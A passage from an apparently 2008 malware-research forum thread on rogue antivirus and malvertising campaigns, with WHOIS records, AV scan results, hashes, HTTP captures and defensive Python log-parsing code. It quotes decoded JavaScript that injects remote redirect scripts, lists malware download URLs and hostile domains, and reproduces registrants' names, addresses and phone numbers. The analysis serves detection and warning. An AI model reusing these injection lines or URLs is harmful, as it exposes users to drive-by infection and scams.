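    for line in log_text.strip().splitlines():
        m = O4_RE.match(line)
        if m:
            parsed = _rundll32_module(m.group("cmd"))
            if parsed is None:
                continue          # only rundll32 launches are examined here
            module, entry = parsed
            reasons = _module_findings(module)
            if reasons:
                findings.append({"type": "O4", "hive": m.group("hive"), "name": m.group("name"),
                                 "module": module, "entry": entry, "reasons": reasons})
            continue
        m = O20_RE.match(line)
        if m:
            reasons = _module_findings(m.group("path"))
            if reasons:
                findings.append({"type": "O20", "hive": "HKLM", "name": m.group("name"),
                                 "module": _norm(m.group("path")), "entry": None, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in scan_hijackthis(SAMPLE_LOG):
        print(f["type"], f["hive"], f["name"], f["module"], f["entry"], "; ".join(f["reasons"]))
```

The Winlogon Notify entry is the one to watch: the O4 Run keys can be deleted, but the O20 entry reloads boot.bak under winlogon on the next boot regardless, which is what the post observed after the reboot.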
Kimberly
<h4>
Domains from 0.exe
</h4>
Today I had a closer look at 0.exe, the file downloaded by c:\boot.bak. 0.exe contains a couple of interesting domains coded into it.
  • www.winifixer.com
  • avxp-08.com
  • youpornztube.com
winifixer.com

Website Title: WiniFixer
ICANN Registrar: ESTDOMAINS, INC.
Created: 2008-01-29
Expires: 2009-01-29
Updated: 2008-07-27
Whois Server: whois.estdomains.com

Server Type: Apache
IP Address: 216.195.41.11
IP Location - China - Clivland Brian

Whois Record
Registration Service Provided By: ESTDOMAINS INC
Contact: +1.3027224217
Website: .www.estdomains.com

Domain Name: WINIFIXER.COM

Registrant:
OOO AJSBIRI
Mishakov Viktor Ivanovich ()
Tihvinskaya, 20
Moscow
Moskovskaya oblast,127055
RU
Tel. +1.2107673441

Creation Date: 29-Jan-2008
Expiration Date: 29-Jan-2009

Domain servers in listed order:
No NameServers Defined.

Administrative Contact:
OOO AJSBIRI
Mishakov Viktor Ivanovich ()
Tihvinskaya, 20
Moscow
Moskovskaya oblast,127055
RU
Tel. +1.2107673441

Technical Contact:
OOO AJSBIRI
Mishakov Viktor Ivanovich ()
Tihvinskaya, 20
Moscow
Moskovskaya oblast,127055
RU
Tel. +1.2107673441

Billing Contact:
OOO AJSBIRI
Mishakov Viktor Ivanovich ()
Tihvinskaya, 20
Moscow
Moskovskaya oblast,127055
RU
Tel. +1.2107673441

Websites.
  1. Winifixer.com
  2. Youpornztube.com
______________________________

youpornztube.com

Website Title: None given.
ICANN Registrar: ESTDOMAINS, INC.
Created: 2008-03-03
Expires: 2009-03-03
Updated: 2008-07-27
Name Server: NS1.YOUPORNZTUBE.COM (has 1 domains)
Name Server: NS2.YOUPORNZTUBE.COM
Name Server: NS4.YOUPORNZTUBE.COM
Name Server: NS5.YOUPORNZTUBE.COM
Whois Server: whois.estdomains.com

Server Type: Apache
IP Address: 216.195.41.11
IP Location - China - Clivland Brian

Whois Record
Registration Service Provided By: ESTDOMAINS INC
Contact: +1.3027224217
Website: .www.estdomains.com

Domain Name: YOUPORNZTUBE.COM

Registrant:
Confidential District Limited
Alex James ()
Suite 2, Portland House, Glacis Road
Suite 2
Not Applicable,gi
GI
Tel. +414.45866123

Creation Date: 03-Mar-2008
Expiration Date: 03-Mar-2009

Domain servers in listed order:
ns5.youpornztube.com
ns4.youpornztube.com
ns2.youpornztube.com
ns1.youpornztube.com

Administrative Contact:
Confidential District Limited
Alex James ()
Suite 2, Portland House, Glacis Road
Suite 2
Not Applicable,gi
GI
Tel. +414.45866123

Technical Contact:
Confidential District Limited
Alex James ()
Suite 2, Portland House, Glacis Road
Suite 2
Not Applicable,gi
GI
Tel. +414.45866123

Billing Contact:
Confidential District Limited
Alex James ()
Suite 2, Portland House, Glacis Road
Suite 2
Not Applicable,gi
GI
Tel. +414.45866123
______________________________

avxp-08.com

Website Title: Antivirus XP 2008
ICANN Registrar: ESTDOMAINS, INC.
Created: 2008-07-24
Expires: 2009-07-24
Updated: 2008-07-27
Name Server: NS1.AVXP-08.COM (has 1 domains)
Name Server: NS2.AVXP-08.COM
Name Server: NS4.AVXP-08.COM
Name Server: NS5.AVXP-08.COM
Whois Server: whois.estdomains.com

IP Address: 85.255.118.171
IP Location - Ukraine - Ukrtelegroup Ltd

Whois Record
Registration Service Provided By: ESTDOMAINS INC
Contact: +1.3027224217
Website: .www.estdomains.com

Domain Name: AVXP-08.COM

Registrant:
eccos inc
krab ()
ny 37str
krabvill
Adygeja - Respublika,1111
RU
Tel. +1.324234234

Creation Date: 24-Jul-2008
Expiration Date: 24-Jul-2009

Domain servers in listed order:
ns5.avxp-08.com
ns4.avxp-08.com
ns2.avxp-08.com
ns1.avxp-08.com

Administrative Contact:
eccos inc
krab ()
ny 37str
krabvill
Adygeja - Respublika,1111
RU
Tel. +1.324234234

Technical Contact:
eccos inc
krab ()
ny 37str
krabvill
Adygeja - Respublika,1111
RU
Tel. +1.324234234

Billing Contact:
eccos inc
krab ()
ny 37str
krabvill
Adygeja - Respublika,1111
RU
Tel. +1.324234234

Websites.
  1. Avxp-08.com
  2. I-kerberos.com
  3. Tobesoftware.com
______________________________

No NS servers are given for winifixer.com. On robtex, just before the page refreshes, we see it had 85.255.117.163 as IP and shared that same IP with youpornztube.com, avxp-08.com, tobesoftware.com and malwareprotector2008.com
IPB Image
Concerning youpornztube.com ... from Robtex
youpornztube.com is a domain controlled by five nameservers at youpornztube.com themselves. There are two duplicate IP numbers. All of them are on the same IP network. Incoming mail for youpornztube.com is handled by one mailserver which is also at youpornztube.com. youpornztube.com has one IP record. ns2.avxp08.com, tobesoftware.com, ns2.tobesoftware.com and ns2.malwareprotector2008.com point to the same IP. avxp08.com, tobesoftware.com and malwareprotector2008.com use this as a nameserver. antivirxp08.com shares nameservers with this domain. avxp08.com, avxp2008.com, antivirxp08.com, tobesoftware.com, bakasoftware.net and at least six other hosts share mailservers with this domain. ns4.youpornztube.com, ns3.youpornztube.com, ns6.youpornztube.com, www.youpornztube.com, ns2.youpornztube.com and at least five other hosts are subdomains of this hostname.
85.255.117.163 is listed as being the current IP of youpornztube.com.

A quick check shows that they are moving domains around though. Currently resolving as ...

78.159.96.16 - tobesoftware.com
78.159.96.16 - advancedxpfixer.com
78.159.96.16 - antivirxp08.com

78.159.96.17 - antivirusprofessional2008.com
78.159.96.17 - avxp08.com
78.159.96.17 - avxp2008.com
78.159.96.17 - avxp-08.com

85.255.114.170 - antivirusxp-2008.com

85.255.118.171 - malwareprotector2008.com
85.255.118.171 - i-kerberos.com

194.110.162.114 - 216.195.41.11 - 216.240.139.169 - antivirusxp2008.com

211.95.79.242 - antivirusxp08.com

216.255.189.155 - bakasoftware.net
Kimberly
<h4>
gnida.swf ... some surprising results
</h4>
gnida.swf, newbieadguide.com & co: are they still used, or dead? Only one way to figure out ... I was kinda surprised when I saw the link newbieadguide.com/swf/gnida.swf?campaign=mortmainon&u23423424 show up in search with a date / time stamp of 2008/07/17 00:54.
IPB Image
Let's narrow down a lil' bit.
IPB Image
Hmm ... some other links point their nose ... lil' peek on them also by isolating some stuff.
IPB Image
In our basket we now have
newbieadguide.com/swf/gnida.swf?campaign=mortmainon&u23423424
www.estandi.yoyo.pl/Aolmail.html
gogele.com
bull.s11.x-beat.com/src/bull124569.gif
and more recently newbieadguide.com replaced by
chocolatgirl.50webs.com/description/lame-enc.html
<h4>
Ready for a ride?
</h4>
newbieadguide.com/swf/gnida.swf?campaign=mortmainon&u23423424

No live redirect right now, at least not for me. It's setting a cookie and not showing stats, so the campaign might still be "in use".
______________________________

estandi.yoyo.pl/Aolmail.html

Interesting case, I must say, as it took me 2 minutes to figure out how the hell I suddenly ended up at scanning-computer-online.com. I didn't even have the chance to see estandi.yoyo.pl/Aolmail.html loading ...
IPB Image
IPB Image
IPB Image
On estandi.yoyo.pl/Aolmail.html we find a reference to a.js
IPB Image
The content of a.js reveals the next location ... aqtravel.info/find/search.php?said=Mkey5&q=Aolmail
IPB Image
At aqtravel.info we stumble on a 302 which forwards us to the fake online scanner.
CODE
GET /find/search.php?said=Mkey5&q=Aolmail HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Accept-Language: en-us
~~~~~~~~~~~~~~~: ~~~~~ ~~~~~~~
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: aqtravel.info
Connection: Keep-Alive

HTTP/1.1 302 Found
Date: Tue, 29 Jul 2008 16:12:16 GMT
Server: Apache/1.3.39 (Unix) PHP/5.2.5
Location: http://scanning-computer-online.com/1/?xx=1&in=2&ag=2&end=1&g=1&affid=401&lid=103
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=iso-8859-1

163
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>302 Found</TITLE>
</HEAD><BODY>
<H1>Found</H1>
The document has moved <A HREF="http://scanning-computer-online.com/1/?xx=1&in=2&ag=2&end=1&g=1&affid=401&lid=103">here</A>.<P>
<HR>
<ADDRESS>Apache/1.3.39 Server at aqtravel.info Port 80</ADDRESS>
</BODY></HTML>
______________________________

chocolatgirl.50webs.com/description/lame-enc.html

The page contains an obfuscated JavaScript.
IPB Image
Once decoded we obtain a link to lineacount.info/cgi-bin/counter?id=133722&ref=
CODE
document.write('<sc'+'ript src="http://lineacount.info/cgi-bin/counter?id=133722&ref='+escape(document.referrer)+'"></sc'+'ript>')
At lineacount.info we again fall on an obfuscated script.
IPB Image
Decoded, it leads to scan.wsp2008scanner.com/263/509/
CODE
document.write('<sc'+'ript> document.location="http://scan.wsp2008scanner.com/263/509/" </sc'+'ript>');
IPB Image
IPB Image
IPB Image
______________________________

gogele.com

gogele.com redirects to landing.trafficz.com/index.php?domain=gogele.com where we get an advertising popup upon entering the website. If you are unlucky, you will get redirected to some fake online scanner. Some examples are described here.
______________________________

bull.s11.x-beat.com/src/bull124569.gif

I'm redirected to an adult website at the time of the write-up. Exploits are possible on such websites.

<h4>
aqtravel.info - 88.214.200.55
</h4>
Website Title: None given.
Created: 2007-06-25
Expires: 2009-06-25
Updated: 2008-06-26
Whois Server: whois.afilias.info
IP Location - United Kingdom - Real International Business Corp

Domain ID:D18657023-LRMS
Domain Name:AQTRAVEL.INFO
Created On:25-Jun-2007 19:57:38 UTC
Last Updated On:26-Jun-2008 10:26:02 UTC
Expiration Date:25-Jun-2009 19:57:38 UTC
Sponsoring Registrar:EstDomains, Inc. (R295-LRMS)
Status:OK
Registrant ID:DI_6401114
Registrant Name:eric peeters
Registrant Organization:N/A
Registrant Street1:stationstraat 87
Registrant Street2:
Registrant Street3:
Registrant City:gent
Registrant State/Province:Oost-Vlaanderen(nl)
Registrant Postal Code:9030
Registrant Country:BE
Registrant Phone:+32.0484659841
Registrant Phone Ext.:
Registrant FAX:
Registrant FAX Ext.:
Registrant Email:
Admin ID:DI_6401114
Admin Name:eric peeters
Admin Organization:N/A
Admin Street1:stationstraat 87
Admin Street2:
Admin Street3:
Admin City:gent
Admin State/Province:Oost-Vlaanderen(nl)
Admin Postal Code:9030
Admin Country:BE
Admin Phone:+32.0484659841
Admin Phone Ext.:
Admin FAX:
Admin FAX Ext.:
Admin Email:
Billing ID:DI_6401114
Billing Name:eric peeters
Billing Organization:N/A
Billing Street1:stationstraat 87
Billing Street2:
Billing Street3:
Billing City:gent
Billing State/Province:Oost-Vlaanderen(nl)
Billing Postal Code:9030
Billing Country:BE
Billing Phone:+32.0484659841
Billing Phone Ext.:
Billing FAX:
Billing FAX Ext.:
Billing Email:
Tech ID:DI_6401114
Tech Name:eric peeters
Tech Organization:N/A
Tech Street1:stationstraat 87
Tech Street2:
Tech Street3:
Tech City:gent
Tech State/Province:Oost-Vlaanderen(nl)
Tech Postal Code:9030
Tech Country:BE
Tech Phone:+32.0484659841
Tech Phone Ext.:
Tech FAX:
Tech FAX Ext.:
Tech Email:
Name Server:NS0.HQHOST.NET
Name Server:NS1.HQHOST.NET

Websites.
  1. Amateur-porn-links.com
  2. Aqtravel.info
  3. Atona.org
  4. Bannergs.info
  5. Bez-piva.net
  6. Boob-porn.net
  7. Boobgayporn.net
  8. Changefuture.net
  9. Cheryclub.com
  10. Cheryclub.org
  11. Digimon-hentai.org
  12. Easyrial.com
  13. Funsjoy.org
  14. Gainrich.net
  15. Geotem.info
  16. Gigonly.info
  17. Givedata.com
  18. Google-defloration.com
  19. Gps-sat-position.com
  20. Helpmothers.net
  21. Hlth-care.com
  22. Hostel-young.com
  23. Intop20.net
  24. Isellbody.com
  25. Korkas.org
  26. Ku4a.com
  27. Kupola-ua.com
  28. Lesbian-adult.net
  29. Lesbiangayadult.net
  30. Lyudmila.net
  31. Mainsearch.biz
  32. Millioncent.com
  33. Myliras.org
  34. Naqtravel.com
  35. Nude-adult.net
  36. Nudegayadult.net
  37. Oblojka.biz
  38. Okolonet.com
  39. Paris-young.com
  40. Pornjokers.com
  41. Rington-city.com
  42. Russtandart.com
  43. Saveage.info
  44. Search-insurance.com
  45. Seopetersburg.com
  46. Skrepka.org
  47. Softseo.net
  48. Start-porn.net
  49. Startgayporn.net
  50. Tablets-city.com
  51. Teens-master.com
  52. Telescope-off.com
  53. Tits-adult.net
  54. Titsgayadult.net
  55. Tooeasycash.com
  56. Webikweb.info
  57. Xfaktorz.org
  58. Xxx-nude.net
  59. Xxxgaynude.net
  60. Yourrial.com
<h4>
scanning-computer-online.com - 91.203.92.48
</h4>
Website Title: None given.
ICANN Registrar: DIRECTI INTERNET SOLUTIONS PVT. LTD. D/B/A PUBLICDOMAINREGISTRY.COM
Created: 2008-07-04
Expires: 2009-07-04
Updated: 2008-07-04
Name Server: NS1.MYNICK.NAME (has 931 domains)
Name Server: NS2.MYNICK.NAME
Name Server: NS3.MYNICK.NAME
Name Server: NS4.MYNICK.NAME
Whois Server: whois.publicdomainregistry.com
IP Location - United Kingdom - Isp Uatelecom Llc

Websites.
<h4>
lineacount.info - 85.255.118.122
</h4>
Website Title: None given.
Created: 2007-05-03
Expires: 2009-05-03
Updated: 2008-06-19
Whois Server: whois.afilias.info

Server Type: Apache/1.3.31 (Unix) mod_python/2.7.10 Python/2.2.2 mod_webapp/1.2.0-dev mod_perl/1.29 mod_throttle/3.1.2 PHP/4.3.8 FrontPage/5.0.2.2510 mod_ssl/2.8.18 OpenSSL/0.9.7d
IP Location - Ukraine - Ukrtelegroup Ltd

Websites.
<h4>
scan.wsp2008scanner.com - 85.255.119.146
</h4>
Website Title: None given.
ICANN Registrar: ESTDOMAINS, INC.
Created: 2008-07-23
Expires: 2009-07-23
Updated: 2008-07-23
Name Server: NS1.EVERYDNS.NET (has 93,672 domains)
Name Server: NS2.EVERYDNS.NET
Name Server: NS3.EVERYDNS.NET
Name Server: NS4.EVERYDNS.NET
Whois Server: whois.estdomains.com

Kimberly
<h4>
c-net 91.208.0
</h4>
Couple of newcomers in the Still Trade Ltd block. See softtraf.com

<h4>
Myspace - antispywaremaster.com
</h4>
Myspace.com is hit again by a malicious Flash banner. More info at FaceTime Security Labs.

The victims are redirected to antispywaremaster.com as seen on the screenshot. Antispywaremaster.com has been mentioned on several occasions by me & Sandi. Not long ago we saw a banner redirecting to them on screensavers.com. ForceUp behind it again? Sandi did mention them a couple of days ago on her blog.
Kimberly
<h4>
91.208.0.233 - 91.208.0.254
</h4>
Couple more from that same block.

Kimberly
<h4>
global-advers.com
</h4>
adtds.trackads.net / adtds2.promoplexer.com have activated a new domain: global-advers.com
global-advers.com/soft.php?aid=0639&d=3&product=XPA
Depending on the parameters, people get redirected to different fake online scanners. I got redirected to
windows-scannernv.com/2008/3/freescan.php?aid=880639
IPB Image
global-advers.com - 89.149.226.24

Website Title: None given.
ICANN Registrar: DIRECTI INTERNET SOLUTIONS PVT. LTD. D/B/A PUBLICDOMAINREGISTRY.COM
Created: 2008-07-30
Expires: 2009-07-30
Updated: 2008-07-30
Registrar Status: clientTransferProhibited
Name Server: NS1.MYNICK.NAME (has 897 domains)
Name Server: NS2.MYNICK.NAME
Name Server: NS3.MYNICK.NAME
Name Server: NS4.MYNICK.NAME
Whois Server: whois.publicdomainregistry.com

IP Location - Berlin - Berlin - Netdirekt E.k

______________________________

windows-scannernv.com - 89.149.226.24

Website Title: None given.
ICANN Registrar: DIRECTI INTERNET SOLUTIONS PVT. LTD. D/B/A PUBLICDOMAINREGISTRY.COM
Created: 2008-07-22
Expires: 2009-07-22
Updated: 2008-07-22
Registrar Status: clientTransferProhibited
Name Server: NS1.MYNICK.NAME (has 897 domains)
Name Server: NS2.MYNICK.NAME
Name Server: NS3.MYNICK.NAME
Name Server: NS4.MYNICK.NAME
Whois Server: whois.publicdomainregistry.com

IP Location - Berlin - Berlin - Netdirekt E.k


Other Websites.

Kimberly
<h4>
Exploiting redirects in Flash content
</h4>
*Sigh* .... another of those sneaky little Flash files (1,394 bytes). This time an executable is downloaded on the PC from www.plgou.com.
IPB Image
Don't visit the site: there are different exploits present, and you could encounter them on any website as they are used in SQL injections. Apparently a user has been hit on my.yahoo, according to Sandi's blog. A Google search on "jjmaobuduo.3322.org/csrss/w.js" already reveals a high number of affected websites.
______________________________

Filename: i47.swf

File size: 1394 bytes
MD5...: b3a302976d5d76a6d28e210b22e535a6
SHA1..: 969935f8367fd738df12b10457897499af4a4b2a
SHA256: f06ff8eb3f3243a3ae0697c3943c8af82ccbbd1381a0c9aef2fdce615ac40b0d
PEiD..: -
packers (Kaspersky): Swf2Swc
QUOTE
File i47.swf received on 08.07.2008 07:45:31
AhnLab-V3 2008.8.7.0 2008.08.07 Win-Trojan/Exploit-SWF.Gen
AntiVir 7.8.1.19 2008.08.06 EXP/Flash.Gen
Authentium 5.1.0.4 2008.08.07 -
Avast 4.8.1195.0 2008.08.06 SWF:CVE-2007-0071
AVG 8.0.0.156 2008.08.06 -
BitDefender 7.2 2008.08.07 Exploit.SWF.Gen
CAT-QuickHeal 9.50 2008.08.06 SWF.Exploit
ClamAV 0.93.1 2008.08.07 -
DrWeb 4.44.0.09170 2008.08.07 -
eSafe 7.0.17.0 2008.08.06 -
eTrust-Vet 31.6.6016 2008.08.06 -
Ewido 4.0 2008.08.06 -
F-Prot 4.4.4.56 2008.08.06 -
F-Secure 7.60.13501.0 2008.08.07 -
Fortinet 3.14.0.0 2008.08.07 -
GData 2.0.7306.1023 2008.08.07 SWF:CVE-2007-0071
Ikarus T3.1.1.34.0 2008.08.07 -
K7AntiVirus 7.10.405 2008.08.06 -
Kaspersky 7.0.0.125 2008.08.07 -
McAfee 5355 2008.08.06 -
Microsoft 1.3807 2008.08.07 Exploit:Win32/APSB08-11.gen!A
NOD32v2 3335 2008.08.07 -
Norman 5.80.02 2008.08.06 -
Panda 9.0.0.4 2008.08.06 -
PCTools 4.4.2.0 2008.08.06 -
Prevx1 V2 2008.08.07 -
Rising 20.56.30.00 2008.08.07 -
Sophos 4.31.0 2008.08.07 Exp/SWFScene-A
Sunbelt 3.1.1537.1 2008.08.07 -
Symantec 10 2008.08.07 -
TheHacker 6.2.96.393 2008.08.04 -
TrendMicro 8.700.0.1004 2008.08.07 -
VBA32 3.12.8.2 2008.08.06 -
ViRobot 2008.8.6.1326 2008.08.06 -
VirusBuster 4.5.11.0 2008.08.06 -
Webwasher-Gateway 6.6.2 2008.08.06 Exploit.Flash.Gen
______________________________

rondll32.exe

File size: 29244 bytes
MD5...: 68ba2b52c10841ea3d3e5d0982f647d8
SHA1..: 1fadf7e63621f5c60246759a0392203451ec6fd7
SHA256: 4315e62ec430fcc7820b95dcbdd780f210e1b55f188d56281c309d08208dc702
PEiD..: -
QUOTE
File rondll32.exe received on 08.07.2008 07:46:26
AhnLab-V3 2008.8.7.0 2008.08.07 -
AntiVir 7.8.1.19 2008.08.06 TR/Dropper.Gen
Authentium 5.1.0.4 2008.08.07 W32/Heuristic-210!Eldorado
Avast 4.8.1195.0 2008.08.06 -
AVG 8.0.0.156 2008.08.06 SHeur.CAWE
BitDefender 7.2 2008.08.07 -
CAT-QuickHeal 9.50 2008.08.06 (Suspicious) - DNAScan
ClamAV 0.93.1 2008.08.07 PUA.Packed.UPack-2
DrWeb 4.44.0.09170 2008.08.07 MULDROP.Trojan
eSafe 7.0.17.0 2008.08.06 Suspicious File
eTrust-Vet 31.6.6016 2008.08.06 -
Ewido 4.0 2008.08.06 -
F-Prot 4.4.4.56 2008.08.06 W32/Heuristic-210!Eldorado
F-Secure 7.60.13501.0 2008.08.07 W32/Suspicious_U.gen
Fortinet 3.14.0.0 2008.08.07 -
GData 2.0.7306.1023 2008.08.07 Backdoor.Win32.Small.flb
Ikarus T3.1.1.34.0 2008.08.07 Trojan-Dropper
K7AntiVirus 7.10.405 2008.08.06 -
Kaspersky 7.0.0.125 2008.08.07 Backdoor.Win32.Small.flb
McAfee 5355 2008.08.06 New Malware.aj
Microsoft 1.3807 2008.08.07 -
NOD32v2 3335 2008.08.07 -
Norman 5.80.02 2008.08.06 W32/Suspicious_U.gen
Panda 9.0.0.4 2008.08.06 Suspicious file
PCTools 4.4.2.0 2008.08.06 Packed/Upack
Prevx1 V2 2008.08.07 Malicious Software
Rising 20.56.30.00 2008.08.07 -
Sophos 4.31.0 2008.08.07 Mal/Packer
Sunbelt 3.1.1537.1 2008.08.07 VIPRE.Suspicious
Symantec 10 2008.08.07 Trojan Horse
TheHacker 6.2.96.393 2008.08.04 W32/Behav-Heuristic-060
TrendMicro 8.700.0.1004 2008.08.07 PAK_Generic.006
VBA32 3.12.8.2 2008.08.06 -
ViRobot 2008.8.6.1326 2008.08.06 -
VirusBuster 4.5.11.0 2008.08.06 Packed/Upack
Webwasher-Gateway 6.6.2 2008.08.06 Trojan.Dropper.Gen
ThreatExpert Report.
______________________________

plgou.com - 121.11.76.85

Domain Name: PLGOU.COM
Registrar: ENAME, INC
Whois Server: whois.ename.com
Referral URL: http://www.ename.com
Name Server: NS1.ENAME.CN
Name Server: NS2.ENAME.CN
Name Server: NS3.ENAME.CN
Name Server: NS4.ENAME.CN
Name Server: NS5.ENAME.CN
Name Server: NS6.ENAME.CN
Status: clientDeleteProhibited
Status: clientTransferProhibited
Updated Date: 10-mar-2008
Creation Date: 17-feb-2008
Expiration Date: 17-feb-2009
Kimberly
<h4>
Nancy Drew - Circulating malvertisement
</h4>
Nancy Drew Solves Mysteries In Style ... whoops ... maybe we should say Nancy Drew Hijacks In Style instead. And this time no redirect to a fake online scanner but an executable. The pest is nifty to remove btw as it belongs to the Vundo family.

Banner.
IPB Image
IPB Image
IPB Image
Redirect.
82.98.235.173/ex3/i.exe
IPB Image
______________________________

Filename: i.exe

File size: 34816 bytes
MD5...: 01511e9da4f526b2b44f772c62b2bedd
SHA1..: 6686169f7240c81bdbe888b3136771317907b657
SHA256: ee374db6872205044a8a8cb518d881b6d9553d10e333329cf8cb709291008102
PEiD..: -
QUOTE
File i.exe received on 08.08.2008 00:43:41
AhnLab-V3 2008.8.8.0 2008.08.07 -
AntiVir 7.8.1.19 2008.08.07 -
Authentium 5.1.0.4 2008.08.07 -
Avast 4.8.1195.0 2008.08.07 Win32:Trojan-gen {Other}
AVG 8.0.0.156 2008.08.07 SHeur.BZCG
BitDefender 7.2 2008.08.07 -
CAT-QuickHeal 9.50 2008.08.07 (Suspicious) - DNAScan
ClamAV 0.93.1 2008.08.07 -
DrWeb 4.44.0.09170 2008.08.07 -
eSafe 7.0.17.0 2008.08.07 Suspicious File
eTrust-Vet 31.6.6018 2008.08.07 -
Ewido 4.0 2008.08.07 -
F-Prot 4.4.4.56 2008.08.07 -
F-Secure 7.60.13501.0 2008.08.07 -
Fortinet 3.14.0.0 2008.08.07 -
GData 2.0.7306.1023 2008.08.07 Win32:Trojan-gen
Ikarus T3.1.1.34.0 2008.08.07 Virus.Win32.Trojan
K7AntiVirus 7.10.407 2008.08.07 -
Kaspersky 7.0.0.125 2008.08.08 -
McAfee 5356 2008.08.07 -
Microsoft 1.3807 2008.08.08 -
NOD32v2 3338 2008.08.07 -
Norman 5.80.02 2008.08.06 -
Panda 9.0.0.4 2008.08.07 -
PCTools 4.4.2.0 2008.08.07 -
Prevx1 V2 2008.08.08 Malicious Software
Rising 20.56.32.00 2008.08.07 Packer.Win32.Mian007.a
Sophos 4.32.0 2008.08.07 -
Sunbelt 3.1.1537.1 2008.08.07 -
Symantec 10 2008.08.08 -
TheHacker 6.2.96.394 2008.08.08 -
TrendMicro 8.700.0.1004 2008.08.07 -
VBA32 3.12.8.3 2008.08.07 -
ViRobot 2008.8.7.1328 2008.08.07 -
VirusBuster 4.5.11.0 2008.08.07 -
Webwasher-Gateway 6.6.2 2008.08.07 Win32.Malware.gen!90 (suspicious)
ThreatExpert Report.

Addendum to the ThreatExpert report.

Visible Signs.

O4 - HKCU\..\Run: [A00F25D34.exe] C:\DOCUME~1\KLY\LOCALS~1\Temp\_A00F25D34.exe
O20 - Winlogon Notify: __c005C86E - C:\WINDOWS\system32\__c005C86E.dat
When Internet Explorer is opened, __c005C86E.dat tries to download additional stuff from nx1.todaystats.com using a special User-Agent, but as seen in the network capture we get a 404 error for the time being.
CODE
GET /?a=4011&t=[removed]/[removed]=&f=0 HTTP/1.1
User-Agent: MSIE
Host: nx1.todaystats.com
Cache-Control: no-cache

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Date: Fri, 08 Aug 2008 04:03:59 GMT
Connection: close
______________________________

82.98.235.173

Whois Record
inetnum: 82.98.235.0 - 82.98.235.255
netname: CYBERTECHNOLOGY
descr: Cyber Technology BV BA/SPRL
descr: Belgium
country: NL
admin-c: OVL3-RIPE
tech-c: OVL3-RIPE
status: ASSIGNED PA
remarks: *******************************************
remarks: * Abuse contact: *
remarks: *******************************************
mnt-by: ABOVENET-P
mnt-lower: ABOVENET-P
mnt-routes: ABOVENET-P
source: RIPE # Filtered

______________________________

nx1.todaystats.com - 82.98.193.167 & 82.98.193.18
todaystats.com - 62.4.84.4
Kimberly
<h4>
New malvertizement for E*Trade Financial
</h4>
Courtesy of Sandi.

E*Trade Financial (etrade.com).
IPB Image IPB Image
Campaign.
stathome.net/c/index.php?id=[removed]
profitabill.com/?cmpid=responsein&adid=intl
More info.
Kimberly
<h4>
123greetings.com - BigHip
</h4>
A new malvertizement is being served on 123greetings.com featuring BigHip Email Marketing Solutions. Fuse Kit 2.1.4 was used for this creative.

Screenshot in situ.
IPB Image
Banner.
imagec05.247realmedia.com/RealMedia/ads/Creatives/123Greet/Servedad_LB_11137A/big_hip_01_728x90.swf
IPB Image
IPB Image
IPB Image
Campaign.
openadstream.net/stat.gif?url=[removed]
At the time of the write-up the full redirect was inactive. Adopstools was not able to analyse the malicious banner.
Kimberly
<h4>
Warning: forbes.com - BigHip
</h4>
The BigHip malvertizement discovered less than 24h ago on 123greetings.com *might* eventually be displayed at forbes.com; everything does of course depend on how long some advertisements are being actively used. The malicious banner is present on their server as seen below.

Screenshot.
IPB Image
Banner.
images.forbes.com/ads/BigHip/New.swf
Campaign.
openadstream.net/stat.gif?url=[removed]
The redirect is identical to the one from 123greetings.com. At the time of the write-up the full redirect was inactive.

Flash banner properties.

Using wget, the flash file has a date stamp from July 11 2008. Until further notice I would recommend extreme caution upon visiting forbes.com.
IPB Image
Network Trace.
CODE
GET http://openadstream.net/stat.gif?url=[removed] HTTP/1.1
Accept: */*
Referer: http://images.forbes.com/ads/BigHip/New.swf
x-flash-version: 9,0,47,0
Accept-Encoding: gzip, deflate
User-Agent: Mozilla
______________________________

On a lighter note, the advertising campaign on 123greetings.com has been suspended earlier today. Ref.
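
The two captured requests from these write-ups (the __c005C86E.dat beacon to nx1.todaystats.com in the Nancy Drew post, and the banner's stat.gif request to openadstream.net above) parsed and tagged the way a proxy-log check would handle them. This is an added example, not code from the posts; the tag names and heuristics are my own, the requests are copied from the captures.

```python
"""Added example, not code from the forum posts: parse the raw HTTP requests
captured in the Nancy Drew (nx1.todaystats.com) and BigHip/forbes.com
(openadstream.net) write-ups and tag what makes each one stand out in a proxy
log.  Both requests are copied from the posts; the tag names are my own."""
import re
from urllib.parse import urlsplit

# Beacon sent by __c005C86E.dat when Internet Explorer is opened (Nancy Drew post).
TODAYSTATS_REQUEST = """GET /?a=4011&t=[removed]/[removed]=&f=0 HTTP/1.1
User-Agent: MSIE
Host: nx1.todaystats.com
Cache-Control: no-cache
"""

# Request made by the Flash banner itself (forbes.com post); note the absolute
# URI in the request line and the missing Host header.
BIGHIP_REQUEST = """GET http://openadstream.net/stat.gif?url=[removed] HTTP/1.1
Accept: */*
Referer: http://images.forbes.com/ads/BigHip/New.swf
x-flash-version: 9,0,47,0
Accept-Encoding: gzip, deflate
User-Agent: Mozilla
"""

# A real browser UA starts with a product/version token ("Mozilla/4.0 (...)").
PRODUCT_TOKEN_RE = re.compile(r"^\S+/\d")


def parse_request(raw):
    """Split a raw request into method, host, path and lower-cased headers."""
    lines = raw.strip().splitlines()
    method, target, version = lines[0].split()
    headers = {}
    for line in lines[1:]:
        if not line.strip():
            break                      # end of the header block
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    if target.startswith(("http://", "https://")):
        # Proxy-style absolute URI: the host lives in the request line.
        parts = urlsplit(target)
        host = headers.get("host") or parts.netloc
        path = parts.path + ("?" + parts.query if parts.query else "")
    else:
        host, path = headers.get("host", ""), target
    return {"method": method, "version": version, "host": host,
            "path": path, "headers": headers}


def classify(req):
    """Tags for the traits seen in the two captures."""
    h, tags = req["headers"], []
    if not PRODUCT_TOKEN_RE.match(h.get("user-agent", "")):
        tags.append("minimal-user-agent")     # "MSIE" / "Mozilla" with no version
    if "accept" not in h:
        tags.append("no-accept-header")       # browsers always send one
    if "x-flash-version" in h:
        tags.append("flash-player-origin")    # request issued by the Flash plugin
    if urlsplit(h.get("referer", "")).path.lower().endswith(".swf"):
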